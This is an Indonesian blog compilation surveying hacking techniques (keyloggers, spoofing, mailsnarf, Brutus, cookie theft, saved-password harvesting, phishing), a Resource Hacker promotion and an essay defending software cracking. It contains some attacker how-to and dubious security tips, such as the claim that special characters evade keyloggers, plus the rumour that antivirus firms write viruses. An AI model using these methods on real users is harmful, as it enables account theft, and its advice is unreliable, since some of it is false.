Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
[5]. Password Cracking

‘Hacking while sleeping.’ itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.
[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
‘HACKED’, ‘DEFACED’, ‘OWNED’.. dll..
Jika ragu-ragu……. reject ajah..
3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
[7]. Menjadi Proxy Server


Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fiturbrowser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools — Internet options — Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file ‘sampah’?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager. Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools — Options — Security – Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi ‘YES’.
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya (It’s fun enough..
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, ‘si pintar’ ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. ‘taman bermain’ anda akan diambil alih olehnya..
[10] Phising

Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN, nomor rekening, nomor kartu kredit Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah
Aksi ini semakin marak terjadi. Tercatat secara global, jumlah penipuan bermodus phising selama Januari 2005 melonjak 42% dari bulan sebelumnya. Anti-Phishing Working Group (APWG) dalam laporan bulanannya, mencatat ada 12.845 e-mail baru dan unik serta 2.560 situs palsu yang digunakan sebagai sarana phishing.
Selain terjadi peningkatan kuantitas, kualitas serangan pun juga mengalami kenaikan. Artinya, situs-situs palsu itu ditempatkan pada server yang tidak menggunakan protokol standar sehingga terhindar dari pendeteksian
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
  • Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit
  • Membuat situs palsu yang sama persis dengan situs resmi.atau . pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
  • Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.
Shared by:
ozcorp@team

Resource Hacking

Kesempatan kali ini saya akan posting tentang resource hacker.

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga
Berbanggalah anda pada diri anda sendiri.
Ini saya kasih SnapShot nya
Gambar di atas, saya lagi mau membuka source dari PhotoScape.
Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.
Okay mantap bukan ?? :-bd
Wuzup dah hehe, bagi kalian yang mau atau berminat ?

Silakan di download di sini

Download dan buka langsung aja.

Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master.
Semoga bermanfaat.

Sumber :
binushacker.net
Fikrifakhrezy.com
ozcorp.blogspot.com

Filosofi cracking

   Pernah dengar istilah kalau ahli komputer (and either hackers or crackers) kadang lebih filosofis dari filsuf itu sendiri? Atau istilah kalau ahli komputer kadang lebih politis dari politisi itu sendiri? Dan lebih ekonomis daripada ekonom itu sendiri?
Filosofi Cracking Software
Filsafat dan Motif Cracking
Kalau kalian pernah melakukan cracking software pasti akrab sama yang namanya program dissassembler Win32dasm, or debugger Olydbg/softice Win API, sampai Ultra Edit32, Hiew, etc. Tools tersebut digunakan untuk meng-crack software, demi untuk menciptakan sesuatu yang beda!!! Dari patching, serial fishing alias hunting serial number, sampai bikin KeyGens. Suatu proses yang menantang, kalau kata filsuf ‘menjelajahi ruang dan waktu untuk menemukan solusi kehidupan.’
Sebelum berfilosofi diwilayah cracking software, sekedar ngingetin, kalau dulu biasanya nge-crack software mungkin hanya membutuhkan waktu 5 smpai 30 menit, tapi sekarang? Hmm kelihatannya programmer makin cerdas berstrategi dalam karya-karyanya ya. Sebagai contoh, berapa lama waktu yang kamu butuhkan untuk nemuin perintah-perintah ‘registrasi’? Istilah-istilah seperti registrasi error, incomplete or incorrect information, or bla..bla…bla… hari ini gk seutuhnya tercetak ‘percis’ alias seperti yang muncul di nag-screen begitu code-code badan software ditrace di dissassembler kamu. Mau jump sana jump sini, push sana push sini, break sana break sini, patch sana patch sini mesti sukses melewati proses panjang terlebih dulu karena perintah-perintah registrasi tersebut diproteksi dengan sempurna sama empunya alias susah dikenali or istilahnya ‘a key based protection’ salah-salah nyampelah di ‘file invalid’ alias gagal sudah karena usaha anda telah di ‘cut-down.’ Kalaupun gk nemu option itu, tetep waktu mengdissassembler software abis ditahapan awal, misalnya karena software gk punya opsi registrasi, kalau kata pemain bola ‘kerja-keras di 15 menit pertama untuk membobol pertahanan lawan.’

Saya gak akan ngebahas lebih jauh tentang proses dissassembler softwarenya sendiri, karena kawan-kawan pasti lebih tahu.Selanjutnya kita bermain-main dengan filosofi dari motif cracking software.

Dalam salahsatu tutorial cracking yang ditulis mahasiswa asing, dia ngungkapin ‘saya melakukan cracking software karena ilham mimpi, menjelajahi dunia dan tertantang menakhlukannya.Aneh ya kedengarannya. Ceritanya bergini, para cracker (atau pun hacker) adalah orang-orang yang senang berkelana, masuk kewilayah-wilayah yang belum pernah terjamah, mengebiri ratusan dan ribuan kode dalam bahasa pemprogaman. Prinsip mereka ‘semakin sulit software di dissassembler atau semakin susah sistem komputer satu web diakses, semakin memuncak lah adrenalin mereka untuk menaklukannya.’ Jadi salah satu motif cracking atau hacking adalah ‘kesenangan menemukan tantangan.’

Kalau kata Descartes bapak filsafat pencerahan ‘cogito ergo sum’ artinya ‘karena berfikir saya ada’, nah kalau waktu nge-crack otak gak dikuras abis sampe pusing tujuh-keliling jangan pernah berfikir bahwa kalian sukses ‘eksis’ sebagai si ahli komputer. Kalau dalam politik, make otak gagal saatnya make otot, tapi kalau dalam teknologi komputer, make otot buat apa? Otak adalah ‘perangkat’ utama dalam proses cracking software, bahwa si cracker dituntut untuk berfikir filosofis, ‘menemukan sesuatu yang sifatnya dasar atau fundamental (namun kadang terhidden dan memerlukan perhitungan yang matang).’ Ciri seorang filsuf adalah menemukan suatu ‘esensi’ terpendam yang ada dalam kehidupan tapi belum tersentuh manusia. "To boldly go where no one has gone before."

Motif kedua erat kaitannya dengan ‘prinsip distribusi’ (distribution) bahwa karya-karya bermanfaat tersebut seharusnya dapat dinikmati setiap pengguna komputer atau khususnya mereka yang membutuhkan. Para cracker software seneng banget kalau tutorialnya berguna buat orang lain dan kalau software-software yang didissassemblernya disebar ke kalangan maya, nginfoin serial number or bagi-bagi Keygens, macem ‘berbuat baik untuk mendapat pahala’ J Gak jarang dari mereka yang nawarin diri untuk bantuin ngecrack software (thanks buat yg satu ini). Nah kalau diskusi sama kawan politik or hukum, mereka pasti pernah nyebut John Rawls, filsuf modern yang juga pemikir politik-hukum yang terkenal dengan prinsip ‘distribusi keadilan’ (distribution of justice). Nah buat mereka yang terlibat dalam cracking software, prinsip distribusi adalah apa yang disebut ‘fair’ (adil) dalam dunia maya, kalau dapet bocoran software yang dibebaskan orang lain maka harus memberi keadilan untuk orang lain dengan juga membebaskan software dan mendistribusikannya.

Motif ketiga mereka yang ‘melek politik-paham ekonomi’ bakal bilang ‘software-software tersebut seharusnya dapat dimanfaatin setiap orang tanpa harus membayar mahal.’ Bayangin kalau file-recover (saya smpet mo beli sebelum ktmu kawan baik hati) harganya 150 dollar, bisa buat beli memori dan hard disk baru. Suatu nafas anti-kapitalis, anti hegemoni dan eksploitasi korporasi, mengutamakan solidaritas, satu prinsip bahwa manusia sesungguhnya bebas namun terikat. Bebas berkarya, bebas merubah satu karya namun terikat oleh lingkungan dimana ia tinggal, kalau mengutip Rousseau sang fisuf politik “man was born free and he is everywhere in chains.”
Motif terakhir, untuk tujuan pendidikan.

Ekonomi-Politik
Nah sekarang saatnya mengkritisi motif cracking No.3. Langsung saja, kalau dalam kajian ekonomi-politik ada yang namanya ‘intangible assets’ (hal-hal berharga yang tidak dapat diraba) yang bikin software jadi mahal. Bahwa sesuatu yang lahir dari knowledge or skills sangat bernilai atau apa yang disebut dengan ‘the value of information.’ Karena begitu berharganya ‘karya cipta’ tersebut si programmer yang kekeh sama prinsip ‘fundamental paradox of information’ gak akan secara gampang ngejual karya ciptanya ke perusahaan, simple karena dia gak mau softwarenya dimonopoli sama satu korporasi tertentu. Tapi ada juga programmer yang otaknya ‘uang’ aja, berstrategi supaya karya ciptanya bisa menghasilkan profit, karenanya informasi sangat mahal dan berfikir dua kali untuk menyerahkannya ke korporat. Kalau programmer kasih software tapi gk kasih informasi gimana cara buat softwarenya, gimana perusahaan mau deal? Nah untuk mengakomodasi hal tersebut alhasil terbentuklah apa yang namanya ‘Firms’ horizontal integration’ dimana satu software dihandle (diproduksi dan didistribusi) sama lebih dari satu perusahaan untuk menjamin tidak adanya monopoli. Tapi gimanapun juga karena perusahaan pastinya berorientasi profit, jadilah software-software tersebut terjual mahal karena mempertimbangkan profit untuk lebih dari satu perusahaan.

Jadi kalau RMS sejak lama berteriak soal open sources dan kemerdekaan software, ini persoalannya. Untuk menjawab ‘luka batin’ para programmer kalau perusahaan-perusahaan berorientasi profit tersebut bakal memonopoli produk. Kenyataannya sama juga kan, tidak dimonopoli pun melibatkan banyak perusahaan, jatuhnya mahal-mahal juga. Ya itulah ekonomi-politik, makanya lumrah kalau aksi-aksi hacking or cracking berangkat dari mereka yang menentang monopoli korporat atas satu karya cipta, itulah politik. Sekali lagi programmer kadang lebih politis dari politisi itu sendiri. Yang juga mungkin bisa bikin kalian buka mata, pernah denger politisasi anti-virus, kalau virus-virus komputer yang beredar sesungguhnya diciptakan oleh para perusahaan pembuat anti-virus. Kalau masalah tidak diciptakan, maka tidak ada pasar, alias kalau gk ada virus siapa yang mau beli anti-virus… J
Sampai sini dapat pointnya?

Saya cuma mau ngajak kawan-kawan bermain-main sedikit dengan filsafat dan ekonomi-politik dalam kaitannya dengan pembangunan teknologi (komputer), jadi kita bisa melihat segala sesuatunya dari berbagai sudut pandang.

Memahami filosofi dalam berkomputer-ria adalah bahwa dalam melakukan suatu aksi kita selalu dilandasi oleh sebuah pandangan atau alasan ‘kenapa sampai berbuat hacking or cracking’ gk sebatas iseng, just for fun, keuntungan pribadi atau nguji kesabaran orang lain. Kalau bermaksud menguji kemampuan pribadi, jangan pernah lupa kalau kalian hidup ditengah2 masyarakat yang berbeda kepribadian.

Artikel ini tidak menganjurkan atau melegalkan ‘cracking’ terhadap software-software komputer, karena sesungguhnya software adalah ‘produk intelektual’ programmer yang mesti dihargai, hanya saja dihakciptakan perusahaan ‘yang memproduksi dan mendistribusikan.’ Sekarang balik lagi ke urusan manusia dan filosofi aksi-aksi mereka. Apa bener kalau yang bikin software itu alias si programmer sepakat ciptaannya di jual mahal ke publik? Balik lagi deh nanya ke si programmer, mereka bakal jawab ‘programmer juga manusia.’ J Kalau nanya ke produser or distributornya mereka juga bakalan jawab ‘pasar perlu produk sementara produser perlu modal, hasilnya sama-sama mendapat profit.’